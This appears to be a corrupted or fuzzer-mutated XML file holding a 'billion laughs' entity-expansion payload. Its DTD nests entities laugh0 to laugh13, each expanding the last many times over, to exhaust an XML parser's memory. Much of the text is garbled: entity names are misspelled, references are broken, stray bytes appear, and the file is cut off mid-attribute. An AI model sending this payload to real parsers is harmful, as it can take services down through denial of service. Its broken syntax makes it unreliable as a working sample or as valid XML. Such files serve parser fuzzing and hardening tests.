<?xsl \
<?xml version="1.0"?>
<!DOCTYPE billion [
<!ELEMENT billion (#PCDATA)>
<!ENTITY laugh0 "ha">
<!ENTITY laugh1 "&laugh0;&laugh0;">
<!ENTITY laugh2 "&laugh1;&laugh1;">
<!ENTITY laugh3 "&laugh2;&laugh2;">
<!ENTITY laugh4 "&laugh3;&laugh3;">
<!ENTITY laugh5 "&laugh4;&laugh4;">
<!ENTITY laugh6 "&laugh5;&;">
<!ENTITY laugh7 "&laugh6;&laugh6;">
<!ENTITY laugh8 "&lažgh7;&laugh7;">
<!ENTITY laugh9 "&laugh8;&laugh8;">
<!ENTITY laugh10 "&laugh9;&laugh9;">
<!ENTITY laufh11
"&laugh10;&laugh10;&laugh10;&laugh10;&laugh14;&laugh10;&laugh10;&laugh10;&laugh10;&laugh10;&laugh10;&laugh1laugh10;&laugh10;&laugh10;&laugh10;&laugh10;&laugh10;&paugh10;&laugh10;&laugh10;&laugh10;&laugh10;&laugh10;&laugh10;&laugh10;&laugh10;&laugh10;&laugh10;&laugh10;&laugh10;&laugh10;&laugh10;&laugh10;&laugh10;&ÿÿÿh10;&laugh10;&laugh10;&laugh10;">
<!ENTITY laugh12
"&laugh11;&laugh11;&laugh11;&laugh11;&#160;&#16laugh11;&l11;&laugh11;&laugh11;&laugh11;&laugh11;&laugh±1;&laugh11laugh11;&laugh11;&laugh11;&laughgh11;&laugh11;&laugh11;&laugh11;&laugh1;&laugh11;&laugh11;&laugh11;&laugh11;&laugh11+&laugh11;&laugh11;&laugh11;&laugh11;&laugh11;&laugh11augh11;&laugh11;&laugh11;&laugh11;&laugh11;&laugh11;&laugR11;">
<!ENTITY laugh13d
"&laugh12;&laugh12;&laugh12;&laugH12;&laugh12;&laugh12;&laugh12;&laugh12;&laugh12;&laugh12;&laugh12;&laugh12;&laugh12;&laugh12;&laugh12;&laugh12;&laugh12;&lauugh11;&laugh11;&#160;&#gh12;&laugh12;&laugh12;&laugh12;&laugh12;&laugh12;&laugh12;&laugh12;&laugh12;&laugh12;&laugh12;&laugh12;&laugh12;&laugh12;&laugh12;&laugh12;&laugh12;&laugh12;&laugh12;&laugh12;&laugh12;&laugh12;&laugh12Y&laugh12;&laugh12;">
]>
<billion location="&laughb`ÿÿck<?xsill